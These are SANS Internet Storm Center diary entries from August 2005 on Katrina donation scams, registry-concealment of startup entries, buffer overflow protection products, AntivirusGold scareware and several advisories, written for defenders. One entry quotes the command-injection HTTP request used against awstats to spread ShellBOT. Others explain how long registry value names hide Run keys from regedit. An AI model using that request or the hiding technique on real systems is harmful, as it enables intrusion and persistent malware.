Published: 2005-08-31

Donations for Katrina victims - be careful

Donations for Katrina victims - be careful

We decided to start a new diary today, regarding the fake domains for donations to the Katrina Hurricanes victims.

We updated with the information of fake emails and domains being used to get donations for the Katrina Hurricane and Brian Krebs just updated the , with new informations about these fake domains.

Some that we strongly suspect so far are katrinahelp.com , katrinarelief.com and katrinacleanup.com.

While trying to do our part, we try to reach the websites administrators. For our surprise, while talking to one of the hosting company of one of the sites, an administrator said:

"Youll have to take that up with paypal we dont govern that sorta thing...while it is well known for scammers to benifit from diasters but unless its harming our network or solid proof that there is damage being done, theres not a whole lot we can do :-/

I can't exactly turn a site off based on a assumption.."

We got information that there are plenty of domains for sale at
, related the Hurricane. A quick look at
services for Katrina name can show you some interesting names...

While some are currently being used to get users/passwords, much can be done with these fake domains, from getting money through fake foundations, or even lead you to install malicious software in the machine.

If you plan do donate, we recommend that you refer to
for a list of reputable agencies or donate to organizations you trust and have past experience with.


Handler on Duty: Pedro Bueno - pbueno $ isc .sans .org
Published: 2005-08-30

Katrina; MSIE Clipboard; Exchange Security Logs

Fake Hurricane emails

Like after similar events in the past, we do expect scams and viruses to take advantage of this situation. Please be careful with e-mails containing 'hurricane videos' as attachments, or e-mail asking for donations. Refer to fema.gov for a list of reputable agencies (see link bellow) or donate to organizations you trust and have past experience with.

Hurricane Katrina

Our sympathies for those affected by Katrina. This has been one of the worst storms in history, and it looks as if it is actually getting worse. For those who are interested, I would encourage you to

Clipboard Data Exposure

Microsoft's Internet Explorer exposes clipboard data via a javascript object 'clipboardData'. While there may be many really great uses for this function, the fact that it can be used with no security confirmation is very disconcerning. Ever work on your company payroll in excel? Copy and paste some of that data? Anywhere you go after that could possibly be collected and abused for any purpose. Hopefully Microsoft will update MSIE to at the very minimum prompt you with a security confirmation. Until then, you should be careful to clear your clipboard before surfing the web, if you deal with any sensitive data.

Exchange Server Security Issue

J.T. Moore sent us a note about the Exchange 2003 install. One interesting side effect is that during the install, the domainprep step grants the "Enterprise Exchange Servers" group the rights to "Manage auditing and security log" this permission can not be safely be removed, as it will cause the exchange server to exhibit errors. Should someone find an exchange server vulnarbility, they would be able to cover their tracks by modifying the security logs.
Published: 2005-08-29

Hurricane Katrina; ShellBOT/awstats; Long Registry Value Names

Hurricane Katrina

Our sympathies for those affected by Katrina. By all measures, this has been
an incredibly expensive storm, and it's not over yet. We're particularly
interested in reports of disaster preparedness and business continuity
actions that were taken, especially the ones that worked! Otherwise, stay
safe and stay dry.

Understandably, there haven't been very many reports of any kind out of the
area yet, but we have heard that there was an Internet2 link that went down
between Houston and Atlanta, which is being worked around.


Reader Wes Oden from Jackson, MS wrote in to let us know that he'd been up
until 5am preparing their office for the storm, and decided to turn the event into
an exercise in remote monitoring after the Governor issued a state of emergency
and requested that all residents stay off the roads. "We took non-critical servers
down to conserve battery power, and now all we can do is sit and wait for the
worst to come and hope the power stays up." We hope so, too.

New ShellBOT spreading via awstats.

We've gotten reports of a new variant of the ShellBOT trojan being spread
via the well known awstats exploit. The hostile HTTP request is:

GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;
cd%20qmail;./start;echo%20;echo| HTTP/1.1

This version brings an irc server and and irc client along for the ride to
implement some command and control channels, as well as an ELF file
infector (Linux.RST.b). We're interested in captures of this command and
control traffic.

More on the overly long registry value name hiding problem:

An article over at PC-Welt (in german; use babelfish if necessary) about which
products successfully handle long registry value names and which ones are partially
blinded by them leads us at the ISC to wonder if different language versions of
Windows 2000 and XP handle long registry value names differently. That could
explain some of the difficulty that various testers have had in validating which
tools work and which platforms are affected.



Published: 2005-08-28

Hurricane Katrina Preparations; Broken Mytob?

Hurricane Katrina Preparations

Hurricane Katrina is now a Category 5 storm and is forecast to hit the New Orleans area and central US Gulf Coast in the next 24 hours with catastrophic damage. The Internet Storm Center is interested in publishing any anecdotal stories from those in the storm's path that pertain to preparations in advance of the storm. Of course, the priority must be on personal and family safety but if you are in the path of the storm and have time to send us a note please do so. We are interested in posting your thoughts, comments, and observations about what you are doing to prepare your computer networks and systems for the coming destructive storm.

Also, we plan to try a new feature of our diary that will allow us to post photos. So, if you have any digital photos of what you are doing to prepare for the storm and would can send them to use, please use the upload form at http://isc.sans.org/contact.php

We'll keep the diary updated as information is submitted to us.

Update - notes from last year

Handler Scott Fendley suggested that we reprint last year's list of hurricane preparation items for anybody in the path of Katrina. Here's the list:

Local IT staff

- Work with local building management to coordinate building shutdowns. Be aware that most buildings will begin shutdown procedures when a Hurricane Warning is issued. (If they say power is going off at 1:00 pm that means power is shutdown at that time not that they are starting to shutdown.) Coordinate with firm wide IT to begin systems shutdown 30 minutes prior to building shutdowns.

- Work with local managers and share any information with Firm wide IT.

- Loaner laptops should be issued to key personnel that do not have laptops.

- Keep a loaner laptop that contains Ghost images for desktops/laptops.

- Ensure you have updated your contact information in the IT Contacts.

Firm wide IT

- Perform a full backup of all systems 4 days prior to the impact of the storm unless already scheduled. Have backups sent off site. (Be aware that UPS, FedEx, etc will stop shipments prior to the hurricanes impact.)

- Perform incremental backups every night prior to storm and have them sent off site.

- Perform Full backup prior to storm impact if possible. Have local IT retain control.

- Once building power is shutdown redirect the main numbers for the affected offices to an offsite voicemail box. (This eliminates busy signals and you can notify clients of the offices' status.)

- Update Office Closure hotline as the situation changes.

- Update Intranet with Hurricane updates for offices in unaffected regions.

- Prepare alternate procedures for the firm wide helpdesk.

- Get any necessary equipment into or out off the offsite datacenters. (Be aware the datacenter will not allow access 48 hours prior to the storm making landfall in the area and will not resume until the local authorities have deemed it safe to travel)

- Wrap critical systems that are located in the affected offices in plastic to help reduce water damage.

We'll take other ideas from readers if you have any. Submit them via our contact page.

Other lists

I hunted around the Internet and found many sites with lists that are useful for anybody in the path of Katrina or the other hurricanes that are expected later this year. There are countless commercial and private lists, so I'm limiting this to just a few of the "official" ones sponsored by various government agencies. Remember the first step of the Six Step Incident Handling Process - PREPARATION. Some of these lists are worth printing and posting on office bulletin boards.







Broken Mytob?

Brian sent us a note that he has received email with an attachment titled "important-details.zip" that he thinks is a broken version of Mytob. If anybody else has seen this or has any analysis to offer please drop us a note via the contact page.

Marcus H. Sachs

SRI International

Handler on Duty


Published: 2005-08-26

More on Registry Concealment; suspected Zotob author arrested

Long Registry Value Name Update

We keep receiving updates about the long registry value name issues. For some
product, you may see only alerts if the value associated with a long registry name matches given signatures. Alerts may not be generated just for having a long registry value name.

Spybot-S&D is able to check values with long names. RegAlyzer 1.1 and Spybot-S&D 1.4 (under the tools -> System Startup section in advanced mode) both do, in fact, see the values with long names and all subsequent values.

Also, note that the Cygwin ls tool mentioned yesterday will show the long value names, but complain about "filename too long".

All Seeing Eye from Fortego has been reported to catch the overly long registry values names properly

WARNING - Tom Liston's tool for looking for long registry value names WILL PEG YOUR PROCESSOR. Get over it.

Zotob arrests in Turkey and Morocco



"The arrest of the eighteen year-old hacker occurred upon the request of FBI, which traced virus back to a website in Morocco, DGSN said.

According to primary investigation, the hacker had accomplices in Turkey, the motive was financial, and he acted in connivance with groups specialised in bankcards forgery."

The two hackers 'Diabl0' (Farid Essebar) and "Coder" (Atilla Ekici) are suspected to be responsible for a number of Mytob an Zotob variants.

Published: 2005-08-25

Updated Windows Registry Concealment Info;Symantec AV Vulnerability

Updated Windows Registry Concealment Info

First of all thank you once again to the scores of people who have sent us data, suggestions, code, test results, etc on this issue. We could not provide what we do to the community without this collective worldwide effort.

We have started to see some possible reports of malware which utilizes this concealment technique in the wild. We expect this trend to continue over the life-cycle of the next few weeks as vendors patch their products as necessary to allows these values to be visible to their scan engines.

With the help of you all we have been collecting reports of what products/versions deal with this issue well or not at all. If you see any inaccuracies or omissions please let us know.
Please don't take this as product bashing. Everyone we've talked to is interested in handling this issue and getting patches out as necessary. However we think its important for users to know if they may have a blindspot in their local system security. I think the take home here is that a malware scanning utility (be it Anti-Virus, Anti-Spyware, etc) that can watch over your registry for you is a critical part of keeping safe and that it will be important to many to watch for product updates in the coming weeks and to get updated (not to mention regular updates, sigs, etc)

Its important to note that many products have several registry-related functions. And each function does not necessarily work as well as others in regards to this issue.

Also version information was not included in all submissions. So if you see a product listed here without a version. It means it might be a good idea to double check, but don't freak out.
Also its important to note that this information is being provided in the hopes you may find it useful. It doesn't imply an opinion, endorsement, etc of SANS or the ISC. Also this list is by no means exhaustive. We're all volunteers just trying to lend a hand and there's only so many hours in the day to analyze, evaluate, test, etc

Products that have been reported to be able to query/report/delete/etc these values:

AppSense Environment Manager

HiJackThis v1.99.1 (SCAN function)

HiJackThis v1.99.2

StillSecure Safe Access

Sysinternals Autoruns (mixed reports)

Regedt32 (Win2k)

Spybot S&D

Products that have been reported to not be able to see this values (at least in some versions) or to behave unexpectedly (crash, etc)


Autoruns 8.13

MS AntiSpyware Beta

HijackThis v1.97.0.7

HiJackThis v1.99.0

HiJackThis v1.99.1* (Generate StartupListLog)

Msconfig (WinXP)

Norton SystemWorks 2003 Pro

RegAlyzer 1.1


reg.exe (under some circumstances)

Registry Explorer

WinDoctor v. 7.00.22

Helpful tools/Tips

Cygwin regtool

(example: regtool list /HKLM/Software/Microsoft/Windows/CurrentVersion/Run)

Cygwin ls

(example: ls -l /proc/registry/HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run)

Perl's Win32::TieRegistry


System Information tool (winmsd.exe)

export registry, make your edits and then re-import

*Special Note: Merjin has been working on this class of issues and keep an eye out for v1.99.2 of HijackThis for full support in dealing with values with long names

And the best for last. Our own Tom Liston has created, out of the kindness of his heart and his deep concern for all of humanity, a recursive registry scanner which will report on values with names in excess of 254 characters. Enjoy! And please let us know if you start finding all sorts of long entries. It will help us get a handle of the prevalence of this issue and we'll provide updates here in the diary as we figure out whats going on so hopefully the world is a little safer place.

FILE: (3584 bytes)






If I leave anyone's name out please forgive me and/or flame me.

A big thanks to:

Aaron, Adam, Alan, Bill, Daniel, Eduardo, Frank, Iain, John, Juanma, Linford, Luis, Merjin, Merrill, Michael, Niels, Randall, Robert (not me, another one), Simon, Tom, and all of the folks on the DShield Forum.

Thought I was kidding didn't you. Thats just folks that have helped us out in the last 24 hours.

You guys rock.

Symantec AV Vulnerability


The Symantec AntiVirus Corporate Edition HTML client help function uses HTML help, the Windows help interface, to provide support to the client user. A non-privileged client user can manipulate the help function to access files on the system with local SYSTEM privileges.

[from Symantec]


Robert Danford

SANS ISC Handler on Duty


Published: 2005-08-24

Nasty Games of Hide and Seek in the Registry; Nepenthes


What started like a nice and quiet day ended with the potential for lots of nasty surprises. A reader alerted us to a vulnerability note published by <A HREF="http://secunia.com/advisories/16560/">Secunia</A> that on first sight did not appear to be overly scary. Once we started to play with it, though, the nastiness became apparent: An overly long registry entry can be added, but won't be shown by regedit and regedt32. Even better, all registry entries that get added afterward under the same key, even if not overly long, will be hidden as well.
[Pause, to give your wheels some time to spin]
Yes. This allows to add hidden entries under the famous HKLM\Software\MS\Windows\CV\Run. Entries that you can't see with regedit, but that will just as faithfully get run at startup.


For a little good news, while regedit is completely blind, the command line "reg" utility can see the entries, apparently.

C:\>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

is the command to use. If it shows you start-up entries that you can't see in regedit, you just found a glitch in the Matrix.

Another faithful tool that doesn't lie like regedit is the tried and true "Autoruns" from Sysinternals: http://www.sysinternals.com/utilities/autoruns.html


Once you've found them, getting rid of the offending registry entries isn't too easy, either. What worked for us during the tests was again "Autoruns" from Sysinternals, presumed you use the current (8.13) version. Older versions seem to occasionally choke on the long value name. Another approach one of the handlers used successfully was to do a "reg export" on the command line of the entire "Run" key. Then he manually deleted the entire "Run" key from the registry, edited the exported file to remove the offending values, and re-imported the reg file, thus recreating the "Run" key.

Of course, the usual disclaimer applies when you are monkey-wrenching the registry. You have been warned.

Let us know!

If you come across a tool that does or doesn't show or remove these hidden values, please let us know. We'll update the diary accordingly.

Update 20:21 UTC: Spybot S&D, AdAware and MS AntiSpyware Beta don't seem to find anything offending with the long value names. "Show Autostarts" of MS AntiSpyware Beta does not list the hidden values (values added after one with a long name). Spybot S&D TeaTimer will intercept these values when they are being added.


Every now and then, news like the news above end up pushing other good stuff out of the diary. Thus, just briefly: If you like "mwcollectd", the automated malware sample collector, chances are you'll like Nepenthes even more. http://nepenthes.sourceforge.net/


Daniel Wesemann

(with lots of research help from the entire handler gang)


Published: 2005-08-23

Windows buffer overflow protection

Windows buffer overflow protection

Today, we solicited ideas for runtime buffer overflow protection on Windows platform. There has been many recent developments in the arena of buffer overflow protection. Many vendors are coming out with their own solution for protecting machines from 0-day buffer overflow attacks. Even the anti-virus vendors are bundling it into the AV solution, is it the next big thing in security or is it another marketing hype?

I have personally seen couple of products in action recently, both performed as it claimed, protected the unpatched machines from buffer overflow attack (different ones for the two products that I have seen). If you have it installed in your environment, please share your thoughts on how it performed.

Here are some of the vendors/products who have solution in this space, feel free to contribute more (with a brief description, please)

* Mcafee VirusScan Enterprise 8i, this AV solution will protect the Windows machine from buffer overflow attack.

* Ozone HIPS is a policy based HIPS that has buffer overflow protection by randomizing the memory address space.

* Prevx is a HIPS that provide buffer overflow protection.

* Mcafee Entercept is Mcafee's IPS solution.

* Cisco CSA, formerly known as Okena StormWatch is Cisco's IPS offering.

* Symantec Critical System Protection is Symantec's behavior based HIPS.

* Win XP SP2 and Win 2K3 SP1 has Data Execution Protection (DEP) built in. It needs more recent CPU from Intel and AMD to provide full protection. See http://support.microsoft.com/kb/875352 [Steve Shockley]

* StackDefender is a based Windows IPS [Simon Howard]

* ISS Protventia Desktop Firewall has a buffer overflow protection engine[Matt Pierce]

* Eeye Blink has buffer overflow protection and has a resonable price point. [Seth Kusiak]

* Sygate Secure Enterprise provide buffer overflow protect as well as a whole lot of other endpoint protection features. [Seth Kusiak]

* Determina SecureCore is another host based IPS product. [Daniel Charboneau]


Another handler Ed Skoudis reminded us that There are two forms of DEP - Software-based DEP and Hardware-based DEP. The software-based stuff is
active by default on WinXP SP 2 regardless of your processor type. It is config'ed to secure "essential Windows components and services", and other apps can be added. The Hardware-based DEP requires a processor that supports NX.

Ed also added that to enable DEP, you have to do the following,

Start-->Settings-->Control Panel-->System-->Advanced.
Click on Settings under Performance, and go to Data Execution Prevention.

Scooter had good experience with Mcafee Enterprise VirusScan 8i. "It has worked as advertised with almost no configuration or customization necessary. It so far has been one of the best implementations of buffer-overflow protection I have seen (i.e. quiet but effective)." [Scooter]

Keng Lim send in an interesting link to information on circumventing MS DEP

Philippe submitted another link to us for circumventing the MS DEP http://www.packetstormsecurity.com/papers/bypass/bypassing-win-heap-protections.pdf [Philippe]

From reader Casey Rhoton, "This is Eeye's IPS solution, and during our evaluation testing, I placed an unpatched Windows 2000 workstation with Blink installed in an out of the box configuration outside our firewall. The machine survived two full weeks outside the firewall with only the Blink client on it. This machine did not have the lastest patches, or AV of any kind on it. Very impressive. We had simular results with Cisco's CSA, but the CSA agent despratly wants to talk to it's managment server, as does McAfee's Intercept product. Both of these products use the Okina core code. The one thing I noticed while testing these products, was that Eeye's Blink was the only product tested, that I did not find any remenants of attack code, or malware on the hard drive after testing. They state that there product stops the attack at the network link, between layers 3 and 4, thus preventing the overflow from ever making it to the physical hard drive. The other products seem to kill the attack at execution. Just my experence with these products. They all have a fairly large memory footprint, some more that others." [Casey Rhoton]

From an anonymous reader, "We have the McAfee Virusscan 8 Buffer Overflow Protection in place on our network. During the recent Zotob outbreak, it worked at first, blocking infection attempts that were coming from our WAN. However, the worm found an unprotected machine on our network, which then found several more unprotected machines. Once there were several infected machines on the LAN, the worm started jumping to protected machines. After analysis, it looks like the machines were somehow overloaded to the point of rebooting (either by network traffic or attempted attacks). As the machines were booting, the anti-virus hadn't started yet, but the Plug and Play service was reachable via TCP port 445. The previously protected machines became infected, after which they ironically started blocking incoming buffer overflow attempts again (albeit too late). Moral of the story - don't depend solely on McAfee Buffer Overflow Protection, because it won't protect you from a network worm while machines are in the process of booting. Perhaps a desktop firewall might help, but I haven't had a chance to test that yet."

JD from VirusIntel.com wrote in and said, "I have implemented VirusScan 8.0i into my organization and its does work well. I think McAfee should adopt Ford's slogan "Have you taken a look at us lately". One thing for readers to keep in mind is that VirusScan 8.0i does not provide protection for all services. I believe readers could search the Knowledge base for a list of services covered. Another consideration that needs to be acknowledged, is that the protection offered, is the removal of malicious code as a result of a buffer overflow. While the attacked system will not be infected, the service that the buffer overflow occurred on, my be left in an unstable state. In the case of MS04-011, this meant a possible reboot.

I have also implemented McAfee's Entercept (HIPS) into my organization as well. I am very impressed with the product. The signature based protection really compliments the behavioral based protection. Creating custom signatures can be very powerful for protecting against new threats, or for other management functions such as USB storage device blocking.

I have also tested PrevX home addition. If you do not mind the chatty warnings, and remember to suspend it before installing software, then it offers great protection for home users. I recommend it for home users that are, well lets say, known for risky internet behavior." Thanks, JD!

John Sawyer wrote in to remind us that Mcafee VirusScan only protects about 20 different applications, so it might not provide sufficient coverage.

Cody Hatch suggests that "eEye's Blink is essentially a network layer-based protocol reassembler. If a protocol doesn't fall within Blink's "understood" protocols, will it get handled appropriately? Since Blink doesn't hook into the kernel and relies solely on network-layer information, encrypting application layer data (an attack can conform to RFCs and have an encrypted application layer) will evade Blink as well." [Update: eEye writes back and confirms that aside from the network traffic examination, Blink does have a kernel driver that is monitoring various kernel API's to see how things are behaving and stop attacks. Also, Blink has protection code that gets injected into applications to generically protect from various bad system calls and functionality behaviors. This confirms Casey Rhoton's statement that the attack code are on residing on the box and even if the attack pass through the network layer checking, it can still be catched by Blink using the above mentioned mechanism.]

Moses Hernandez has the following comments, "From my experience the eEYE Product has a network and application firewall and a RFC Based IPS. What this means is that it has taken RFC's and created rules based upon what the RFC denoted parameters are. We did not get hit with zotob or any other worm in the last 8 months. I know that the company has stated for the Zotob infection that any machine with the Blink client did not necessarily need to be patched rigth away since the IPS portion should protect the client. Additionally the 2.0 Product includes a Advanced Application Protection Piece. Most badly written software will trigger the Application protection so i've only been able to use this on very specific locked down machines. This will protect any piece of software from running inside Ring 0 (NT Kernel Protected Space). Since most malware and spyware will run inside of this it will protect that. I have no idea if this includes Buffer Overflow attacks but i am sure it must at some level inspect this.

The Cisco CSA Client with the Okena code is a different animal. It does have some features while will allow applications not to run. If the machine is however not configured correctly, then renaming the application will allow said application to run. Additionally it is an anomoly engine. It will need to "learn" what is a "normal" traffic pattern to be able to protect against "abnormal" traffic patterns such as a DoS attack. Finally about needing to be hooked into the mothership, please note that there are configurations that will allow you to use what they mention as a Headless CSA, it has a default policy. This is used on the Cisco ACS product and also the Cisco Callmanager.

Lastly the Zonelabs Integrity Client which is an enterprise client of ZoneLabs Firewall now has the Checkpoint Smartdefense Filters already applied to it. I Cannot comment more than to say that these are the same filters you find on the Interspect Engine and I believe more than what you find on the FW1/VPN1 firewalls. They are signature based and do require updates. The nice things are people with organizations that have Checkpoint Products will now have a unified Dashboard, Logging, Tracking and more features than I care to go into." Thanks, Moses


Jason Lam

ISC handler on duty - jason /at/ networksec /dot/ org


Published: 2005-08-22

Port 8008; Quiet Day, Thanks!; Money-Back Guarantee; Follow the Bouncing Malware VII: All That Glitters Is Not Gold

Port 8008

We're seeing a spike on as a result of the kidz looking for machines that are vulnerable to a recently (Mid-August) announced remote stack overflow in Novell eDirectory Server. Jus' a heads up: If you haven't patched - PATCH!

Quiet Day, Thank You!

Tap, tap, tap...

Hello? Is this thing on?

In contrast with the craziness of the past week, today was so quiet, you could hear a packet drop.

With Zotob and an IE "Zero-Day" hitting pretty much simultaneously, we've really been hoppin'. Last week, during one 24 hour period, we had over 500 emails. Combine that with trying to reverse engineer the Zotob variant of the hour, come up with an easy-to-do MSDDS.DLL fix, or deciding what to do with the Infocon, and it makes life "interesting."

Speaking of that...

Satisfaction Guaranteed, Or Double Your Money Back

For the most part, when people write in, they're kind and polite. They realize that we're just a bunch of geeks/nerds who are trying to help people out and doing it for... well... for nothing. There are about 35 ISC Handlers, and while I don't think any of us would ever claim to have the whole network security "thing" down individually, together we're pretty darned smart. When you write in and ask a question, we do our best to answer it intelligently, honestly, and without bias. We also answer it for free.

That's why it's especially disheartening to have some mental midget tee off on us about:

1) Our choice of when to raise / lower the Infocon.

2) Spelling / grammar / sentence structure.

3) When something on the site isn't working exactly how they think it should.

4) Personal attacks.

5) The grumble du jour.

When I was but a wee lad (I really was young once, and did not, despite popular legend, spring fully formed from the head of Zeus) my Grandmother always told me, "If you can't say something nice, just keep your mouth shut, you stupid little jackass."

Note: The irony of that was lost on me (amid deep psychological scars) until recently.

Therefore, to the bitter, ungrateful (and fearful - did you really need to use an anonymous remailer?) folks out there, and in the spirit of my grandmother's advice, I've decided that I will personally fund the following offer:
If you find that you're displeased in any way with the service
provided by the Internet Storm Center, we will cheerfully refund
double the amount of money that you pay us... you stupid little jackass.

You may now return to your drab, wretched lives.

Follow the Bouncing Malware VIII: All That Glitters Is Not Gold

The story thus far...

From the beginning, Man has always felt a need to document the world around him. Even the earliest proto-humans were driven to scratch marks on cave walls, and in fact, the walls of a cave in Lascaux France were decorated by their inhabitants some 20,000 years ago. Modern anthropologists have described these as primitive paintings of bulls and horses. However, ask any red-blooded modern male what he figures a cave man would be painting on the living room wall, and he'll tell you what those pictures are really all about: Broads.

Naked broads.

Really ugly, hairy, naked broads.

At the dawn of the 21st century, not much had changed. The cave-wall has been replaced with HTML, the primitive pigments with digital cameras, and... well... the broads have shed some hair in addition to their clothes.

One thing really has changed, however. Instead of simply being satisfied with a still-life, we now have the option to show pictures that move. Thus one can now find displayed on various Internet "cave walls" a plethora of on-line documentaries showing how poverty stricken (and thus, clothing-deprived) young adults huddle together and use various friction generating techniques to keep warm.

Ethel, you put your clothes on!

Even in those very early times, porn and other illicit activities probably went hand in hand. You can almost picture Ogg, the caveman, clubbing his pal Grogg, and stealing his pile of shiny rocks after inviting him over to see his etchings of Annugg Kournikovugg.

As I said, not much has changed.

Our pal Joe Sixpack recently went searching for several of the aforementioned documentaries on the Internet. That search required that he install a "codec" to increase his viewing pleasure, and the non-obvious outcome of that viewing has been documented in
and . (If you haven't read these... well, why haven't you? What, do you live under a rock? Sheesh! Go read them now. I'll wait.)

A real gentleman

While we all might be shocked and awed by the fact that Joe's computer was gettin' what the folks in Joe's movies were gettin', it might not have been all bad. It appears that someone might have, as the saying goes, bought Joe's computer some dinner first...

You see, while Joe's machine was being man-handled by others, the fine, gentlemanly folks at Antivirus-Gold.com were, figuratively speaking, knocking on the front door, bearing a bouquet of roses and a box of candy. They're the sensitive types. They want to be Joe's friend. They know, all too well, the trials and tribulations of the modern Internet age and, by golly, they're here to help.

How you doin? I'm holdin' my own.

And so, while Joe is be-boppin' across the Internet, watching people bein' bopped, something new and different happens. While he's seen many a thing pop up on his screen over the past few minutes, a bright orange window is somewhat unexpected. (Note: The enlightened among you need to read no further. Simply from the fact that the makers of AntivirusGold chose "orange" as the color for their window, it can be inferred that they are, indeed, in league with the minions of Chaos. As the Universal Arbiter of Good Taste and quite the snappy dresser (if I do say so myself) I have, long ago, publicly declared my least favorite color, orange, as representative of Nameless Evil.)

In any case, the appearance of a window bearing the hues of the-color-that-shall-not-be-named catches Joe, who is otherwise occupied, a bit off guard:

"Welcome to the AntivirusGold 2.0 Setup Wizard"

Were Joe more of an active participant in this little mise-en-scene, the leap to thoughts of viruses might be a less jarring of juxtaposition. As things stand, however, virus "protection" isn't foremost in Joe's thoughts, and with his free hand, he clicks through the Evil-colored windows trying to return to his previously scheduled programming.

Joe agrees to the program's license, lets the installer chose the directory where the files will go, and then, happily clicks on "Install," hoping to be done with this whole sordid mess and return to the business... uh... at hand.

But, when another, even more evil-colored window pops up, declaring that his now freshly scanned computer is infected with spyware, Joe decides that perhaps it's time he found a new hobby. Luckily for him, this wonderful, new-found antivirus program that seemed to have been magically installed on his machine had not only warned him about the spyware, but it was now offering to remove it for him...

Oh, joy!

Goin' for Gold

AntivirusGold showed up on Joe's machine as avg.exe, 2,663,231 bytes of NullSoft installer goodness. (Note: AntivirusGold should not be confused with AVG Antivirus by Grisoft. Through an unfortunate coincidence of naming, they sound a whole lot alike. They aren't. The folks at Grisoft are good people, and I don't want any confusion about names to lead anyone to think otherwise.)

When an installer weighs in anywhere over 2MB, you gotta figure that what's going to come out the other side may not be too pretty. AntivirusGold certainly doesn't disappoint. The programmer in me could spend quite a few paragraphs enumerating the slipshod results of unintelligent software engineering, but let's just leave it at this: I have about as much respect for their programming talent as I have for their taste in color.

"So it's another poorly written piece of software," I hear you cry. "If that was a crime, Redmond would be a penitentiary."

"True," I reply, "and if these folks stopped there, then I would only make fun of them behind their backs, like I do to Microsoft."

The problem is, they don't stop there.

You see, AntivirusGold is a nasty little lying piece of software.

What did you say, Tom?

"A nasty little lying piece of software."

Got it now?

AntivirusGold does indeed act something like antivirus software. It scans through registry entries and cookies looking for the likes of Gator, Bonzi Buddy, et al. It looks through the filesystem and tries to find programs that match up (by filename only, not any type of signature) with a list of "known bad" files.

If it stopped there, then it would simply be a poorly written, ineffective spyware/virus scanner.

But there's more.

When it gets all done doing its scan, it tells you what it found and offers to remove it for you. Just like every other spyware/virus scanner...

But this one does it for a price.

Yes, you see, AntivirusGold pops up a window telling you "You are infected!", and offers to remove the "spyware" that it found. But when you click on the "Remove spyware" button, rather than removing something, it only offers you the option to register the program to the tune of $29.95.

The implication is obvious: "I found something bad on your machine, and it'll cost you three sawbucks to get it gone."

And what, pray tell, did AntivirusGold find that required removal and made it worth my hard-earned $29.95?


Absolutely nothing.

Using monitoring software, I watched as AntivirusGold scanned my machine.

I watched it looking for registry entries.

I watched it looking for cookies.

I watched it looking for files.

It didn't find a thing. Every query that it made for a cookie, a registry entry, or a file came back empty.

Now it's not exactly surprising that it didn't find anything. You see, AntivirusGold was running on a fresh, clean, brand-spankin' new install of Windows XP Home Edition that had never been used and never connected to the Internet.


The only non-default software on the machine was AntivirusGold itself.

And yet, I was "infected" with "spyware."

The astute reader may draw their own conclusions.


Handler on Duty - Tom Liston, Intelguardians

Published: 2005-08-21

Slow Sunday; CA Message Queuing Vulns; Process Explorer Vuln; Infocon: Green Redux

Ahh the glory..

of a Sunday shift. Peace and quiet. Quite a difference given the extraordinary amount of traffic on the handlers list in the past week. Phew. Lucky me.

CA Message Queuing Vulnerabilities

Fixes for a number of CA Message Queuing Products have been made available. These vulnerabilities included a possible DoS vuln, a buffer overflow and possible spoofing vuln that would allow arbitrary commands to be executed. More information is available at:


Sysinternals Process Explorer Vulnerability

A vulnerability in the venerable Process Explorer from Sysinternals has been disclosed. It has been found to be prone to a buffer overflow that could result in the execution of arbitrary code. More information is available at


From the Last Diary Entry: Infocon back to Green.

Our Infocon is back to Green status after stay Yellow within 24 Hours for alerting new MS IE msdds.dll issue. Microsoft releases their advisory yesterday with some more information. You can find more information from our yesterday's diary. Even though we are back to green status, the issue still exists and will keep updating any new information and stay with us.


Published: 2005-08-19

INFOCON back to GREEN; Cisco "device" Zotob & Rbot problems, Spanish Zotob description, Sun LPD remote exploit; More about Msdds.dll issue

Infocon back to Green.

Our Infocon is back to Green status after stay Yellow within 24 Hours for alerting new MS IE msdds.dll issue. Microsoft releases their advisory yesterday with some more information. You can find more information from our yesterday's diary. Even though we are back to green status, the issue still exists and will keep updating any new information and stay with us.

Cisco "device" Zotob & Rbot problems

The UK's NISCC published that says that "Symptoms on Cisco devices include, but are not limited to, high CPU and traffic drops on the input interfaces."

**snipped from NISCC**

"Affected Products

If the software versions or configuration information are provided, then only those combinations are vulnerable. This is a list of appliance software that needs patches downloaded from Cisco:
* Cisco CallManager
* Cisco Customer Response Application Server (CRA)
* Cisco Personal Assistant
* Cisco Conference Connection (CCC)

* Cisco Emergency Responder

Other Cisco products that run on a Microsoft-based operating system should strongly consider loading the security update from Microsoft at


This list is not all inclusive, so refer to Microsoft's Advisory if you think you have an affected Microsoft platform.

* Cisco Unity

* Cisco Building Broadband Service Manager (BBSM)
* Cisco CNS Network Registrar (CNR)
* Cisco Customer Voice Portal
* Cisco ICM Enterprise Edition
* Cisco ICM Hosted Edition
* Cisco IP Contact Center (IPCC) (Express, Enterprise, Hosted, Remote Agent)
* Cisco E-mail Manager (CEM)
* Cisco Web Collaboration Option
* Cisco Collaboration Server Dynamic Content Adapter
* Cisco Media Blender (CMB)
* Cisco IP Interactive Voice Response
* IP Queue Manager

* Cisco Customer Voice Portal
* Cisco Computer Telephony Integration Option
* Cisco Outbound Option
* Cisco Remote Monitoring Suite Option
* Cisco Support Tools
* TrailHead (Part of the Web Gateway solution)
* Cisco Networking Services for Active Directory (CNS/AD)

* Cisco SN 5400 Series Storage Routers (driver to interface to Windows server)

* CiscoWorks
-- + CiscoWorks VPN/Security Management Solution (CWVMS)
-- + User Registration Tool

_- + LAN Management Solution
-- + Routed WAN Management

-- + Service Management
-- + IP Telephony Environment Monitor

-- + Small Network Management Solution

-- + QoS Policy Manager

-- + Voice Manager

* Cisco Transport Manager (CTM)

* Cisco Broadband Troubleshooter (CBT)
* DOCSIS CPE Configurator

* Access Control Server (ACS)

* Videoconferencing Applications

-- + IP/VC 3540 Video Rate Matching Module
-- + IP/VC 3540 Application Server"

The advisory also includes ACL's for IOS.

Spanish version Zotob description.

One of our reader who is Javier translate our recent description of Zotob variant explaination to Spanish. Even I don't understand Spanish, it will be good for people who is their native language is Spanish. You can find information at here


Sun LPD remote exploit

The Sun Microystems released patch 8th of August. Today the metasploit released new exploit module for Solaris LPD remote exploit. If you are not using the LPD service, disable it. Editing the /etc/inetd.conf file and comment out the following part.

#printer stream tcp6 nowait root /usr/lib/print/in.lpd in.lpd

Of course, don't forget to execute hangup signal to inetd process: /usr/bin/pkill -HUP inetd

